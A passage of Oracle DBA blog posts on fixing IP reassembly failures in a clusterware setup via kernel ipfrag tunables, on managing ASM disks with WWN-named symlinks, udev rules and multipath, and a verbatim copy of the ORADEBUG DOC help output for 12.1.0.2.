Reassembly happens when the sender wants to send more data than fits into a single packet. In this cluster the MTU size is 1500 - and in our example we had 16465 datagrams which needed to be reassembled, but 6313 failed. There are some tunables in the Linux kernel that affect the buffer used to reassemble fragmented datagrams.

The solution for our system was to increase 2 parameters:

net.ipv4.ipfrag_high_thresh = 16777216
net.ipv4.ipfrag_low_thresh = 15728640

These can be changed in the running system in
/proc/sys/net/ipv4/ipfrag_low_thresh
/proc/sys/net/ipv4/ipfrag_high_thresh
and for persistent changes in sysctl.conf

Unfortunately these parameters were not mentioned in any of the prerequisite scripts I found.

With all this knowledge, we identified an important difference to other clusters: this one is the only one with MTU 1500 - so many more fragmented packets needed care here.

After the issue itself was solved, I wondered if it could be found on a vanilla 12.1 CRS installation
(vanilla in comparison to our setup, where oswatcher was installed due to the first SRs).
Yes, our beloved -MGMTDB holds the information already! It's in the documentation as well (Troubleshooting Oracle Clusterware), and in the output of oclumon dumpnodeview I can see
IPReasFail - Number of failures detected by the IPv4 reassembly algorithm
Node: yyy1 Clock: '16-11-26 06.55.27 Etc/GMT' SerialNo:443 
NICS:
bond0 netrr: 159.021 netwr: 181.688 neteff: 340.709 nicerrors: 0 pktsin: 412 pktsout: 358 errsin: 0 errsout: 0 indiscarded: 0 outdiscarded: 0 inunicast: 412 innonunicast: 0 type: PUBLIC
lo netrr: 37.722 netwr: 37.722 neteff: 75.443 nicerrors: 0 pktsin: 95 pktsout: 95 errsin: 0 errsout: 0 indiscarded: 0 outdiscarded: 0 inunicast: 95 innonunicast: 0 type: PUBLIC
bond1 netrr: 2350.313 netwr: 42989.510 neteff: 45339.823 nicerrors: 0 pktsin: 1927 pktsout: 31345 errsin: 0 errsout: 0 indiscarded: 0 outdiscarded: 0 inunicast: 1927 innonunicast: 0 type: PRIVATE
PROTOCOL ERRORS:
IPHdrErr: 0 IPAddrErr: 102203 IPUnkProto: 0 IPReasFail: 59886 IPFragFail: 0 TCPFailedConn: 12598 TCPEstRst: 335559 TCPRetraSeg: 67276584 UDPUnkPort: 40134 UDPRcvErr: 0

Unfortunately the format is kind of clumsy - I will need to dig into its tables for a better output, especially for quick but powerful reports during problems.


During my research, I discovered it's not an Oracle-only problem; others are affected as well (and provide a great description).






          handling disks for ASM - when DB, Linux and Storage admins work together   
A proper management of ASM Disks can be a complicated task.

On DOAG2015 I discussed with Martin Bach about the concept in my current company, where we implemented a setting which is consistent, robust and enables Storage, Linux and DB admins to work together easily.

As we started to think about ASM when 10.1 came out, we evaluated our options. asmlib was discarded quite early, as it only increased complexity without adding value: we have a SAN (Fibre Channel) infrastructure with 2 separate fabrics, so a proper multipath configuration is needed anyway - ASM (or asmlib) cannot handle this itself. Also, asmlib hides storage details from DBAs/ASM admins, whereas we wanted to enable every person involved to know as many details as possible, easily.

We also saw that ASM sometimes takes a long time to scan for new disks if there are many "files" (devices) matching asm_diskstring. This happens on every access of v$asm_disk - so use v$asm_disk_stat instead, as this view does not rescan but only shows information about devices already in the SGA.

asm_diskstring

We set asm_diskstring to a dedicated directory; in our case it's /appl/oracle/asm_disks/*. This speeds up a rescan of all "disks", and it's also a clear indicator of all the disks ASM uses. There we have symlinks to devices in /dev/mapper/.

symlinks

The symlink has this format:
/appl/oracle/asm_disks/360060e80167bd70000017bd700000007p1_p9500_b52_MONIQP01_000 -> /dev/mapper/360060e80167bd70000017bd700000007p1

Some information about the values we store there:
360060e80167bd70000017bd700000007p1 is the WWN of the disk, together with its partition (p1). The WWN is very useful in every discussion with storage admins, as it identifies the LUN from their perspective. We decided to partition the disks: our records show that Linux admins touch un-formatted devices more often than devices which are already formatted. There were also some cases in early tests where the first block of a disk was cached by the kernel. Both issues are addressed by formatting every disk. If required, partitioning can also help to adapt alignment.
p9500 is a short name which identifies the storage box with a name we can use during discussions. It's encoded within the WWN as well, so it's pure redundancy - but it makes discussions much easier.
b52 is a short name identifying the datacenter. As our fabrics span several datacenters, it's sometimes nice to get a quick picture of the topology.
MONIQP01_000 is the label used in some storage boxes. It contains the diskgroup name and a sequence number. At the moment it's NOT the name of an ASM disk, but this could be introduced easily.
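The naming scheme above can be automated so every new disk gets a consistent link. A small sketch under the assumptions of this schema (the directory, the field order and the helper name make_asm_link are mine, not part of any tool):

```shell
# Sketch: link a /dev/mapper multipath device into the dedicated
# asm_diskstring directory under the name
#   <wwn+partition>_<storagebox>_<datacenter>_<label>
# ASM_DIR can be overridden for testing.
ASM_DIR=${ASM_DIR:-/appl/oracle/asm_disks}

make_asm_link() {
  wwn=$1 box=$2 dc=$3 label=$4
  # -sfn: symbolic, force-replace an existing link, don't follow it
  ln -sfn "/dev/mapper/${wwn}" "${ASM_DIR}/${wwn}_${box}_${dc}_${label}"
}

# Example, matching the symlink shown above:
#   make_asm_link 360060e80167bd70000017bd700000007p1 p9500 b52 MONIQP01_000
```

Driving this from a small inventory file (one line per disk) keeps the symlink farm reproducible after a server rebuild.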

As the name of a diskgroup is coded into our naming schema, it's not accepted to reuse a disk for another diskgroup. (Technically it's still possible; we just agreed not to do so.) Even though this seems to limit the DBAs' flexibility, there are good reasons for it: disks are sometimes created with dedicated settings/parameters for a special purpose, and reusing such disks in other DGs would cause strange and hard-to-find performance symptoms. So if disks are not needed anymore, we always "destroy" them and create new ones when needed.

udev rules

Our udev ruleset on RedHat 6 is quite simple:
the file /etc/udev/rules.d/41-multipath.rules contains lines such as:
ACTION=="add|change", ENV{DM_NAME}=="360060e80167bd70000017bd700000007p1", OWNER:="oracle", MODE:="0660", GROUP:="asmadmin"
We do not do any mapping of names here - it's only there to set permissions.
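Since every disk needs one such line, generating the rules from the WWN list avoids copy-paste mistakes. A sketch (the helper name gen_udev_rules is mine; owner/group values match the rule shown above):

```shell
# Sketch: emit permission-setting udev rules (as in 41-multipath.rules)
# for a list of multipath WWNs, so new disks are added consistently.
gen_udev_rules() {
  for wwn in "$@"; do
    printf 'ACTION=="add|change", ENV{DM_NAME}=="%s", OWNER:="oracle", MODE:="0660", GROUP:="asmadmin"\n' "$wwn"
  done
}

# Example:
#   gen_udev_rules 360060e80167bd70000017bd700000007p1 \
#     >> /etc/udev/rules.d/41-multipath.rules
#   udevadm control --reload-rules   # pick up the new rules
```

After reloading, the permissions take effect on the next add/change event for the device (or after re-triggering it with udevadm trigger).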

multipath

The config in /etc/multipath.conf is quite simple, containing only the parameters required for each specific storage vendor/product.


I cannot say a lot about the configuration outside of the Linux server; both SAN fabrics and the storage system are "just working".





          ORADEBUG DOC 12.1.0.2   
This is just an online copy of the ORADEBUG DOC output in 12.1.0.2.
The general comments from Tanel Poder apply to this version as well.




SQL> oradebug doc

Internal Documentation
**********************

EVENT Help on events (syntax, event list, ...)
COMPONENT [<comp_name>] List all components or describe <comp_name>

ORADEBUG DOC EVENT

SQL> oradebug doc event

Event Help:
***********

Formal Event Syntax
--------------------
<event_spec> ::= '<event_id> [<event_scope>]
[<event_filter_list>]
[<event_parameters>]
[<action_list>]
[off]'

<event_id> ::= <event_name | number>[<target_parameters>]

<event_scope> ::= [<scope_name>: scope_parameters]

<event_filter> ::= {<filter_name>: filter_parameters}

<action> ::= <action_name>(action_parameters)

<action_parameters> ::= <parameter_name> = [<value>|<action>][, ]

<*_parameters> ::= <parameter_name> = <value>[, ]


Some Examples
-------------
* Set event 10235 level 1:
alter session set events '10235';

* Set events SQL_TRACE (a.k.a. 10046) level 1:
alter session set events 'sql_trace';

* Turn off event SQL_TRACE:
alter session set events 'sql_trace off';

* Set events SQL_TRACE with parameter <plan_stat> set to 'never'
and parameter <wait> set to 'true':
alter session set events 'sql_trace wait=true, plan_stat=never';

* Trace in-memory the SQL_MONITOR component (the target) and all its
sub-components at level high. Get high resolution time for each
trace:
alter session set events 'trace[sql_mon.*] memory=high,
get_time=highres';

* On-disk trace PX servers p000 and p005 for components 'sql_mon'
and 'sql_optimizer' (including sub-components) at level highest:
alter system set events 'trace[sql_mon | sql_optimizer.*]
{process: pname = p000 | process: pname=p005}';

* Same as above but only when SQL id '7ujay4u33g337' is executed:
alter system set events 'trace[sql_mon | sql_optimizer.*]
[sql: 7ujay4u33g337]
{process: pname = p000 | process: pname=p005}';

* Execute an action immediatly by using 'immediate' for the event
name:
alter session set events 'immediate eventdump(system)'

* Create an incident labeled 'table_missing' when external error
942 is signaled by process id 14534:
alter session set events '942 {process: 14534}
incident(table_missing)';


Notes
-----
* Implicit parameter level is 1 by default
e.g. '10053' is same as '10053 level 1'

* Event target (see [<target_parameters>] construct) is only
supported by specific events like the TRACE[] event

* <event_scope> and/or <event_filter> are constructs
that can be used for any event

* Same event can be set simultaneously for a different scope or
target but not for different filters.

* '|' character can be used to select multiple targets, scope or
filters.

E.g. 'sql_trace [sql: sql_id=g3yc1js3g2689 | sql_id=7ujay4u33g337]'

* '=' sign is optional in <*_parameters>

E.g. 'sql_trace level 12';

* Like PL/SQL, no need to specify the parameter name for target,
scope, filters and action. Resolution is done by position in
that case:

E.g. 'sql_trace [sql: g3yc1js3g2689 | 7ujay4u33g337]'


Help sub-topics
---------------

NAME [<event_name>] List all events or describe <event_name>
SCOPE [<scope_name>] List all scopes or describe <scope_name>
FILTER [<filter_name>] List all filters or describe <filter_name>
ACTION [<action_name>] List all actions or describe <action_name>


SQL> spool off


ORADEBUG DOC EVENT NAME

SQL> oradebug doc event name

Events in library DIAG:
------------------------------
trace[] Main event to control UTS tracing
disable_dde_action[] Event used by DDE to disable actions
ams_trace[] Event to dump ams performance trace records
ams_rowsrc_trace[] Event to dump ams row source tracing
sweep_verification Event to enable sweep file verification
enable_xml_inc_staging Event to enable xml incident staging format
dbg[] Event to hook dbgtDbg logging statements

Events in library RDBMS:
------------------------------
wait_event[] event to control wait event post-wakeup actions
alert_text event for textual alerts
trace_recursive event to force tracing recursive SQL statements
clientid_overwrite event to overwrite client_identifier when client_info is set
sql_monitor event to force monitoring SQL statements
sql_monitor_test event to test SQL monitoring
eventsync_tac Event posted from events syncing tac
sql_trace event for sql trace
pmon_startup startup of pmon process
background_startup startup of background processes
db_open_begin start of db open operation
test_gvtf test GV$() Table Tunction
fault Event used to inject fault in RDBMS kernel
gcr_systest gcr_systest
em_express EM Express debug event
emx_control event to control em express
emx_test_control event to control em express testing
awrdiag[] AWR Diagnostic Event
msgq_trace event to control msgq tracing
ipclw_trace event to control ipclw tracing
kbc_fault event to control container fault injection
asm_corruption_trace event to control ASM corruption tracing
kxdrs_sim debug event to simulate certain conditions in kxdrs layer

kcfio_debug debug event to debug kcfio based on event level

krbabrstat_fault event to control krbabrstat fault injection
periodic_dump[] event for periodically dumping

Events in library GENERIC:
------------------------------
kg_event[] Support old error number events (use err# for short)

Events in library CLIENT:
------------------------------
oci_trace event for oci trace

Events in library LIBCELL:
------------------------------
libcell_stat libcell statistics level specification
cellclnt_skgxp_trc_ops Controls to trace SKGXP operations
cellclnt_ossnet_trc Controls to trace IP affinity in ossnet
cellclnt_high_lat_ops Control to trace High-latency I/O operations
diskmon_sim_ops[] Diskmon simulation events
cellclnt_read_outlier_limit Control to trace read I/O outliers
cellclnt_write_outlier_limit Control to trace write I/O outliers
cellclnt_lgwrite_outlier_limit Control to trace log write I/O outliers
cellclnt_sparse_mode Mode of how to handle sparse buffers

Events in library ADVCMP:
------------------------------
arch_comp_level[] arch_comp_level[<ulevel, 1-7>]
ccmp_debug columnar compression debug event
inmemory_nobasic disable KDZCF_IMC_BASIC implementation
inmemory_nohybrid disable KDZCF_IMC_HYBRID implementation
ccmp_align columnar compression enable alignment
ccmp_countstar columnar compression enable count(*) optimization
ccmp_dumpunaligned columnar compression dump dbas of unaligned CUs
ccmp_rbtree columnar compression switch back to rb tree
inmemory_force_ccl inmemory force column compression levels
inmemory_imcu[] inmemory_imcu[<ulevel= nocomp|dml|query_low|query_high|capacity_low|capacity_high>]

Events in library PLSQL:
------------------------------
plsql_event[] Support PL/SQL error number events


SQL> spool off


ORADEBUG DOC EVENT NAME <event_name>
SQL> ORADEBUG DOC EVENT NAME trace

trace: Main event to control UTS tracing

Usage
-------
trace [ component <string>[0] ]
disk < default | lowest | low | medium | high | highest | disable >,
memory < default | lowest | low | medium | high | highest | disable >,
get_time < disable | default | seq | highres | seq_highres >,
get_stack < disable | default | force >,
operation <string>[32],
function <string>[32],
file <string>[32],
line <ub4>


SQL> spool off


SQL> ORADEBUG DOC EVENT NAME disable_dde_action

disable_dde_action: Event used by DDE to disable actions

Usage
-------
disable_dde_action [ action_name <string>[100] ]
facility <string>[20],
error <ub4>


SQL> spool off


SQL> ORADEBUG DOC EVENT NAME ams_trace

ams_trace: Event to dump ams performance trace records

Usage
-------
ams_trace [ relation <string>[30] ]

SQL> spool off


SQL> ORADEBUG DOC EVENT NAME ams_rowsrc_trace

ams_rowsrc_trace: Event to dump ams row source tracing

Usage
-------
ams_rowsrc_trace [ relation <string>[30] ]
level <ub4>


SQL> spool off


SQL> ORADEBUG DOC EVENT NAME dbg

dbg: Event to hook dbgtDbg logging statements

Usage
-------
dbg [ component <string>[0] ]
operation <string>[32],
function <string>[32],
file <string>[32],
line <ub4>


SQL> spool off


SQL> ORADEBUG DOC EVENT NAME wait_event

wait_event: event to control wait event post-wakeup actions

Usage
-------
wait_event [ name <string>[64] ]


SQL> ORADEBUG DOC EVENT NAME awrdiag

awrdiag: AWR Diagnostic Event

Usage
-------
awrdiag [ name <string>[64] ]
level <ub4>,
str1 <string>[256],
str2 <string>[256],
num1 <ub8>,
num2 <ub8>


SQL> spool off


SQL> ORADEBUG DOC EVENT NAME periodic_dump

periodic_dump: event for periodically dumping

Usage
-------
periodic_dump [ name <string>[64] ]
level <ub4>,
seconds <ub4>,
lifetime <ub4>


SQL> spool off


SQL> ORADEBUG DOC EVENT NAME kg_event

kg_event: Support old error number events (use err# for short)

Usage
-------
kg_event [ errno <ub4> ]
level <ub4>,
lifetime <ub4>,
armcount <ub4>,
traceinc <ub4>,
forever <ub4>


SQL> spool off


SQL> ORADEBUG DOC EVENT NAME diskmon_sim_ops
Error: "diskmon_sim_ops" not a known event/library name
Use <event_name>, <library_name> or <library_name>.<event_name>

SQL> spool off


SQL> ORADEBUG DOC EVENT NAME arch_comp_level

arch_comp_level: arch_comp_level[<ulevel, 1-7>]

Usage
-------
arch_comp_level [ ulevel <ub4> ]
ilevel <ub8>,
sortcols <ub4>,
cusize <ub4>,
analyze_amt <ub4>,
analyze_rows <ub4>,
analyze_minrows <ub4>,
mincusize <ub4>,
maxcusize <ub4>,
mincurows <ub4>,
align <ub4>,
rowlocks <ub4>,
maxcuhpctfree <ub4>,
guarantee_rll <ub4>,
cla_stride <ub4>,
dict_cla_stride <ub4>


SQL> spool off


SQL> ORADEBUG DOC EVENT NAME inmemory_imcu

inmemory_imcu: inmemory_imcu[<ulevel= nocomp|dml|query_low|query_high|capacity_low|capacity_high>]

Usage
-------
inmemory_imcu [ ulevel < invalid | nocomp | dml | query_low | query_high | capacity_low | capacity_high > ]
target_rows <ub4>,
source_maxbytes <ub4>


SQL> spool off


SQL> ORADEBUG DOC EVENT NAME plsql_event

plsql_event: Support PL/SQL error number events

Usage
-------
plsql_event [ errno <ub4> ]

SQL> spool off



ORADEBUG DOC EVENT SCOPE

SQL> oradebug doc event scope

Event scopes in library RDBMS:
------------------------------
SQL[] sql scope for RDBMS


SQL> spool off


ORADEBUG DOC EVENT SCOPE SQL
SQL> oradebug doc event scope sql

SQL: sql scope for RDBMS

Usage
-------
[SQL: sql_id <string>[20] ]


SQL> spool off



ORADEBUG DOC EVENT FILTER

SQL> ORADEBUG DOC EVENT FILTER

Event filters in library DIAG:
------------------------------
occurence filter to implement counting for event checks
callstack filter to only fire an event when a function is on the stack
eq filter to only fire an event when a == b
ne filter to only fire an event when a != b
gt filter to only fire an event when a > b
lt filter to only fire an event when a < b
ge filter to only fire an event when a >= b
le filter to only fire an event when a <= b
anybit filter to only fire an event when (a & b) != 0
allbit filter to only fire an event when (a & b) == b
nobit filter to only fire an event when (a & b) == 0
bet filter to only fire an event when b <= a <= c
nbet filter to only fire an event when a < b or a > c
in filter to only fire an event when a is equal to any b .. p
nin filter to only fire an event when a is not equal to any b .. p
streq filter to only fire an event when string s1 = s2 (up to <len> characters)
strne filter to only fire an event when string s1 != s2 (up to <len> characters)
tag filter to only fire an event when a tag is set

Event filters in library RDBMS:
------------------------------
wait filter for specific wait parameters and wait duration
process filter to set events only for a specific process
px filter to check identity of the process for fault injection

Event filters in library GENERIC:
------------------------------
errarg filter to set error events only for a specific error argument


SQL> spool off



ORADEBUG DOC EVENT FILTER <filter_name>
SQL> ORADEBUG DOC EVENT FILTER occurence

occurence: filter to implement counting for event checks

Usage
-------
{occurence: start_after <ub4>,
end_after <ub4> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER callstack

callstack: filter to only fire an event when a function is on the stack

Usage
-------
{callstack: fname <string>[64],
fprefix <string>[64],
maxdepth <ub4> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER eq

eq: filter to only fire an event when a == b

Usage
-------
{eq: a <ub8>,
b <ub8> }


SQL>

SQL> ORADEBUG DOC EVENT FILTER ne

ne: filter to only fire an event when a != b

Usage
-------
{ne: a <ub8>,
b <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER gt

gt: filter to only fire an event when a > b

Usage
-------
{gt: a <ub8>,
b <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER lt

lt: filter to only fire an event when a < b

Usage
-------
{lt: a <ub8>,
b <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER ge

ge: filter to only fire an event when a >= b

Usage
-------
{ge: a <ub8>,
b <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER le

le: filter to only fire an event when a <= b

Usage
-------
{le: a <ub8>,
b <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER anybit

anybit: filter to only fire an event when (a & b) != 0

Usage
-------
{anybit: a <ub8>,
b <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER allbit

allbit: filter to only fire an event when (a & b) == b

Usage
-------
{allbit: a <ub8>,
b <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER nobit

nobit: filter to only fire an event when (a & b) == 0

Usage
-------
{nobit: a <ub8>,
b <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER bet

bet: filter to only fire an event when b <= a <= c

Usage
-------
{bet: a <ub8>,
b <ub8>,
c <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER nbet

nbet: filter to only fire an event when a < b or a > c

Usage
-------
{nbet: a <ub8>,
b <ub8>,
c <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER in

in: filter to only fire an event when a is equal to any b .. p

Usage
-------
{in: a <ub8>,
b <ub8>,
c <ub8>,
d <ub8>,
e <ub8>,
f <ub8>,
g <ub8>,
h <ub8>,
i <ub8>,
j <ub8>,
k <ub8>,
l <ub8>,
m <ub8>,
n <ub8>,
o <ub8>,
p <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER nin

nin: filter to only fire an event when a is not equal to any b .. p

Usage
-------
{nin: a <ub8>,
b <ub8>,
c <ub8>,
d <ub8>,
e <ub8>,
f <ub8>,
g <ub8>,
h <ub8>,
i <ub8>,
j <ub8>,
k <ub8>,
l <ub8>,
m <ub8>,
n <ub8>,
o <ub8>,
p <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER streq

streq: filter to only fire an event when string s1 = s2 (up to <len> characters)

Usage
-------
{streq: s1 <string>[256],
s2 <string>[256],
len <ub4> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER strne

strne: filter to only fire an event when string s1 != s2 (up to <len> characters)

Usage
-------
{strne: s1 <string>[256],
s2 <string>[256],
len <ub4> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER tag

tag: filter to only fire an event when a tag is set

Usage
-------
{tag: tname <string>[64] }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER wait

wait: filter for specific wait parameters and wait duration

Usage
-------
{wait: minwait <ub8>,
p1 <ub8>,
p2 <ub8>,
p3 <ub8>,
_actual_wait_time <ub8> default 'evargn(pos=1)',
_actual_wait_p1 <ub8> default 'evargn(pos=2)',
_actual_wait_p2 <ub8> default 'evargn(pos=3)',
_actual_wait_p3 <ub8> default 'evargn(pos=4)' }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER process

process: filter to set events only for a specific process

Usage
-------
{process: ospid <string>[20],
orapid <ub4>,
pname <string>[20],
con_id <ub8> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER px

px: filter to check identity of the process for fault injection

Usage
-------
{px: slave_set <ub4>,
slave_num <ub4>,
local_slave_num <ub4>,
instance_id <ub4>,
dfo_number <ub4>,
oct <ub4>,
pxid <ub4> }


SQL> spool off


SQL> ORADEBUG DOC EVENT FILTER errarg

errarg: filter to set error events only for a specific error argument

Usage
-------
{errarg: arg1 <string>[50],
arg2 <string>[50],
arg3 <string>[50],
arg4 <string>[50],
arg5 <string>[50],
arg6 <string>[50],
arg7 <string>[50],
arg8 <string>[50] }


SQL> spool off




ORADEBUG DOC EVENT ACTION

SQL> ORADEBUG DOC EVENT ACTION

Actions in library DIAG:
---------------------------
evfunc - Get posting function name
evfile - Get posting file name
evline - Get posting file line number as ub8
evfmt - Get trace / log format string
evargc - Get count of event check arguments as a ub8
evargn - Get event check argument value as ub8
evargp - Get event check argument value as void *
evargs
- Get event check argument as string, with optional format
errargs - Get error argument as string
errargn - Get error argument as ub8
errargp - Get error argument as pointer
errargc - Get count of error arguments as a ub8
sum
- Compute a1 + a2 + ... + a15 as ub8 (zero if all NULL)
trace
- trace to disk; apply format to string arguments
% is an argument placeholder
\n and \t are supported. Use double \ as escape
sub - Compute a1 - a2 as ub8
add - Compute a1 + a2 as ub8
mod - Compute a1 modulo a2 as ub8
div - Compute a1 / a2 as ub8
mul - Compute a1 * a2 as ub8
incr - Increment ptr by offset
decr - Decrement ptr by offset
refn
- Dereference ptr-to-number: *(ub<numsize>*)(((ub1*)<ptr>)) + <offset>)
refp
- Dereference ptr-to-ptr: *(ub1**)(((ub1*)<ptr>)) + <offset>)
refs
- Dereference ptr-to-string: *(oratext **)(((ub1*)<ptr>) + <offset>)
Length is optional; NULL-terminated string is assumed
refsl
- Dereference ptr-to-string: *(oratext **)(((ub1*)<ptr>) + <offset>)
with ptr-to-length: *(ub<lensize>*)(((ub1*)<ptr>) + <lenoffset>)
dumpFrameContext - Dump Frame Context contents
dumpBuckets
kgsfdmp
dumpDiagCtx
dumpDbgecPopLoc
dumpDbgecMarks
dumpGeneralConfiguration
dumpADRLockTable
shortstack
- get short stack (up to 256 characters)
showoffsets controls display of code offsets
skipframes can be used to overcome 256 char limit
dbgvci_action_signal_crash

Actions in library RDBMS:
---------------------------
incident - Create an Incident
sqlmon_dump - SQL Monitor Dump SGA Action
varaddr - Return address of a fixed PGA/SGA/UGA variable
username - Return user log-in name
sqlid - Return current SQL Id in character format
flashfreeze
oradebug - debug process using ORADEBUG
debugger - debug process using System Debugger
debug
- alias for 'debugger' - debug process using System Debugger
crash - crash process
kill_instance - killing RDBMS instance
controlc_signal - received 1013 signal
eventdump - list events that are set in the group
kdlut_bucketdump_action
kzxt_dump_action
dumpKernelDiagState
HMCHECK (async)
DATA_BLOCK_INTEGRITY_CHECK (async)
CF_BLOCK_INTEGRITY_CHECK (async)
DB_STRUCTURE_INTEGRITY_CHECK (async)
REDO_INTEGRITY_CHECK (async)
TRANSACTION_INTEGRITY_CHECK (async)
SQL_TESTCASE_REC (async)
SQL_TESTCASE_REC_DATA (async)
ORA_12751_DUMP
sqladv_dump_dumpctx
ORA_4030_DUMP
- dump summary of PGA memory usage, largest allocations
ORA_4036_DUMP - dump summary of PGA memory usage
HNGDET_MEM_USAGE_DUMP_NOARGS - dump hang detection memory usage
kcfis_action - kcfis actions
exadata_dump_modvers - Exadata dump module versions
QUERY_BLOCK_DUMP - Debug action for dumping a qbcdef tree
dumpADVMState - Dump contents of ADVM state
dumpASMState - Dump contents of ASM state
ASM_CHECK_DG (async) - Run check diskgroup
ASM_DUMP_KSTSS - Dump KST Trace and System State
ASM_MOUNT_FAIL_CHECK (async)
ASM_DGFDM_CHECK_NO_DG_NAME (async)
ASM_SYNC_IO_FAIL_CHECK (async)
ASM_DG_FORCE_DISMOUNT_CHECK (async)
ASM_ALLOC_FAIL_CHECK (async)
ASM_ADD_DISK_CHECK (async)
ASM_FILE_BUSY_CHECK (async)
ASM_TOOMANYOFF_FAIL_CHECK (async)
ASM_INSUFFICIENT_DISKS_CHECK (async)
ASM_INSUFFICIENT_MEM_CHECK (async)
KJZN_ASYNC_SYSTEM_STATE (async)
KSI_GET_TRACE - Get lmd0 traces for ksi issues
TRACE_BUFFER_ON - Allocate trace output buffer for ksdwrf()
TRACE_BUFFER_OFF
- Flush and deallocate trace output buffer for ksdwrf()
LATCHES - Dump Latches
XS_SESSION_STATE - Dump XS session state
PROCESSSTATE - Dump process state
SYSTEMSTATE - Dump system state
INSTANTIATIONSTATE - Dump instantiation state
CONTEXTAREA - Dump cursor context area
HEAPDUMP
- Dump memory heap (1-PGA, 2-SGA, 4-UGA, +1024-Content)
POKE_LENGTH - Set length before poking value
POKE_VALUE - Poke a value into memory
POKE_VALUE0 - Poke 0 value into memory
GLOBAL_AREA
- Dump fixed global area(s) (1=PGA/2=SGA/3=UGA, add +8 for pointer content)
REALFREEDUMP - Dump PGA real free memory allocator state
FLUSH_JAVA_POOL - Flush Java pool
PGA_DETAIL_GET
- Ask process to publish PGA detail info (level is pid)
PGA_DETAIL_DUMP
- Dump PGA detail information for process (level is pid)
PGA_DETAIL_CANCEL - Free PGA detail request (level is pid)
PGA_SUMMARY - Summary of PGA memory usage, largest allocations
MODIFIED_PARAMETERS - Dump parameters modifed by session (level unused)
ERRORSTACK
- Dump state (ksedmp). Use INCIDENT action to create incident
CALLSTACK - Dump call stack (level > 1 to dump args)
RECORD_CALLSTACK
- Record or dump call stack, level = #frames (level += 1000000 go to trc)
BG_MESSAGES - Dump routine for background messages
ENQUEUES
- Dump enqueues (level >=2 adds resources, >= 3 adds locks)
KSTDUMPCURPROC
- Dump current process trace buffer (1 for all events)
KSTDUMPALLPROCS
- Dump all processes trace buffers (1 for all events)
KSTDUMPALLPROCS_CLUSTER
- Dump all processes (cluster wide) trace buffers (1 for all events)
KSKDUMPTRACE - Dumping KSK KST tracing (no level)
DBSCHEDULER - Dump ressource manager state
LDAP_USER_DUMP - Dump LDAP user mode
LDAP_KERNEL_DUMP - Dump LDAP kernel mode
DUMP_ALL_OBJSTATS - Dump database objects statistics
DUMPGLOBALDATA - Rolling migration DUMP GLOBAL DATA
HANGANALYZE - Hang analyze
HANGANALYZE_PROC - Hang analyze current process
HANGANALYZE_GLOBAL - Hang analyze system
HNGDET_MEM_USAGE_DUMP - dump hang detection memory usage
GES_STATE - Dump DML state
RACDUMP - Dump RAC state
OCR - OCR client side tracing
CSS - CSS client side tracing
CRS - CRS client side tracing
SYSTEMSTATE_GLOBAL - Perform cluster wide system state dump (via DIAG)
DUMP_ALL_COMP_GRANULE_ADDRS
- MMAN dump all granule addresses of all components (no level)
DUMP_ALL_COMP_GRANULES
- MMAN dump all granules of all components (1 for partial list)
DUMP_ALL_REQS
- MMAN dump all pending memory requests to alert log
DUMP_TRANSFER_OPS - MMAN dump transfer and resize operations history
DUMP_ADV_SNAPSHOTS
- MMAN dump all snapshots of advisories (level unused)
CONTROLF - DuMP control file info
FLUSH_CACHE
- Flush buffer cache without shuting down the instance
SET_AFN - Set afn # for buffer flush (level = afn# )
SET_ISTEMPFILE
- Set istempfile for buffer flush (level = istempfile )
FLUSH_BUFFER - Reuse block range without flushing entire cache
BUFFERS - Dump all buffers in the buffer cache at level l
SET_TSN_P1
- Set tablespace # for buffer dump (level = ts# + 1)
BUFFER
- Dump all buffers for full relative dba <level> at lvl 10
BC_SANITY_CHECK
- Run buffer cache sanity check (level = 0xFF for full)
SET_NBLOCKS - Set number of blocks for range reuse checks
CHECK_ROREUSE_SANITY - Check range/object reuse sanity (level = ts#)
DUMP_PINNED_BUFFER_HISTORY
- kcb Dump pinned buffers history (level = # buffers)
REDOLOGS - Dump all online logs according to the level
LOGHIST
- Dump the log history (1: dump earliest/latest entries, >1: dump most recent 2**level entries)
REDOHDR - Dump redo log headers
LOCKS - Dump every lock element to the trace file
GC_ELEMENTS - Dump every lock element to the trace file
FILE_HDRS - Dump database file headers
FBINC
- Dump flashback logs of the current incarnation and all its ancestors.
FBHDR - Dump all the flashback logfile headers
FLASHBACK_GEN - Dump flashback generation state
KTPR_DEBUG
- Parallel txn recovery (1: cleanup check, 2: dump ptr reco ctx, 3: dump recent smon runs)
DUMP_TEMP - Dump temp space management state (no level)
DROP_SEGMENTS - Drop unused temporary segments
TREEDUMP
- Dump an index tree rooted at dba BLOCKDBA (<level>)
KDLIDMP - Dump 11glob inodes states (level = what to dump)
ROW_CACHE - Dump all cache objects
LIBRARY_CACHE
- Dump the library cache (level > 65535 => level = obj @)
CURSORDUMP - Dump session cursors
CURSOR_STATS - Dump all statistics information for cursors
SHARED_SERVER_STATE - Dump shared server state
LISTENER_REGISTRATION - Dump listener registration state
JAVAINFO - Dump Oracle Java VM
KXFPCLEARSTATS - Clear all Parallel Query messaging statistics
KXFPDUMPTRACE - Dump Parallel Query in-memory traces
KXFXSLAVESTATE - Dump PX slave state (1: uga; 2: current cursor state; 3: all cursors)
KXFXCURSORSTATE - Dump PX slave cursor state
WORKAREATAB_DUMP - Dump SQL Memory Manager workarea table
OBJECT_CACHE - Dump the object cache
SAVEPOINTS - Dump savepoints
RULESETDUMP - Dump rule set
FAILOVER - Set condition failover immediate
